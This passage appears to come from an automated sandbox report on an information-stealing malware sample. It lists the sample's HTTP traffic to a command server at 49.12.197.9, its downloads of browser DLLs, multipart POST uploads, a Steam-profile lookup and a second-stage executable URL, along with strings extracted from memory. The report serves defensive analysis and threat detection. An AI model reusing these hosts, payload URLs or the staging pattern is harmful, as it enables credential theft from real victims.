                          Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 1025 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 461 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 97509 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 147.45.44.104 | Cache-Control: no-cache
                          Source: unknown | TCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global traffic | HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global traffic | HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                          Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 49.12.197.9 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe0
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: aspnet_regiis.exe, 00000003.00000002.3379210269.000000001C0A1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3382857072.000000002204D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                          Source: aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/$
                          Source: aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/-end-point:f
                          Source: aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/5
                          Source: aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/;
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/A
                          Source: aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/CAAFHIEBKJ
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/N
                          Source: aspnet_regiis.exe, 00000003.00000003.2517610034.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/S
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/W
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/b
                          Source: aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll6
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/g
                          Source: aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll.9#
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllhy=
                          Source: aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllll
                          Source: aspnet_regiis.exe, 00000003.00000003.2517610034.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/o
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/ta_
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/y
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9FHIEHDGI--
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9HIEBAK
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9IEHDGI
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
